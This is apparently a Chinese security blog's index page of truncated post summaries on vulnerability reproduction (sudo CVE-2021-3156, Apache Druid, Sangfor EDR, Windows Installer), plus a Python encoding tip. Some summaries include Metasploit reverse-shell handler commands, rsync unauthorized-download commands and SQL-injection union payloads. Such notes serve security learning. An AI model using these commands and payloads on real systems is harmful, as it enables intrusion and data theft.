摘要: 漏洞描述 在安装MSI程序包时,Windows Installer会建立一个回滚脚本,以防安装失败时可以修复安装过程中进行了一系列修改。 但 Windows Installer 程序中存在漏洞,允许攻击者在安装过程中自定义回滚脚本的执行路径,进而导致Windows使用高权限执行该目标程序,完成权限提 阅读全文
posted @ 2021-03-14 15:15 vvan9 阅读(1859) 评论(0) 推荐(0) 编辑
摘要: 参考大佬的复现过程:https://www.cnblogs.com/cHr1s/p/14365418.html 概述 Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低 阅读全文
posted @ 2021-02-03 18:32 vvan9 阅读(680) 评论(0) 推荐(0) 编辑
摘要: exp地址:https://github.com/blasty/CVE-2021-3156 影响版本: Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 不受影响版本: Sudo =>1.9.5p2 复现过程: 阅读全文
posted @ 2021-01-31 12:36 vvan9 阅读(1178) 评论(0) 推荐(0) 编辑
摘要: 1、手动将response设置为utf-8编码 response=requests.get(url) response.encoding='utf-8' page_text=response.text 2、将字符串先进行iso-8859-1编码,再进行gbk解码 str=str.encode('is 阅读全文
posted @ 2020-09-19 20:45 vvan9 阅读(2523) 评论(1) 推荐(2) 编辑
摘要: 记录学习爬虫过程中的实例链接:http://note.youdao.com/noteshare?id=63b4021d3ba9c42437bdbcf6064009f1&sub=791206C474404AF2946A21361EDC30DC 阅读全文
posted @ 2020-09-19 19:45 vvan9 阅读(820) 评论(0) 推荐(0) 编辑
摘要: 深信服EDR漏洞分析 RCE getshell 如果说最近爆出的0day当中最为人熟知的莫过于最先爆出的深信服EDR的0day了,只需要凭借着简单的复现条件就可以对漏洞加以利用,那么我们下面来分析一下深信服EDR的几个比较高危的漏洞吧。 首先从广为人知的c.php开始说起,这个漏洞的复现条件极为简单 阅读全文
posted @ 2020-08-28 10:12 vvan9 阅读(1602) 评论(0) 推荐(0) 编辑
摘要: msf下的命令 set session x:设置要攻击的session #监听端口反弹PHP shell use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST set LPORT run #end #w 阅读全文
posted @ 2020-08-12 22:36 vvan9 阅读(888) 评论(0) 推荐(0) 编辑
摘要: 873 rsync 未授权访问:rsync IP:: //这是在默认条件下没有改变默认的端口,默认密码是::rsync --port=xxx ip:: //如果修改了默认端口就需要指定端口,这里就是需要自己指定47900端口rsync -avz ip::www /tmp //-avz是下载文件的命令 阅读全文
posted @ 2020-08-03 20:45 vvan9 阅读(1117) 评论(0) 推荐(0) 编辑
摘要: 1、联合查询注入:爆库名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),3 --+爆表名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select table 阅读全文
posted @ 2020-07-09 11:51 vvan9 阅读(414) 评论(0) 推荐(0) 编辑
摘要: 写的通俗易懂 https://deerchao.cn/tutorials/regex/regex.htm 阅读全文
posted @ 2020-04-14 23:10 vvan9 阅读(148) 评论(0) 推荐(0) 编辑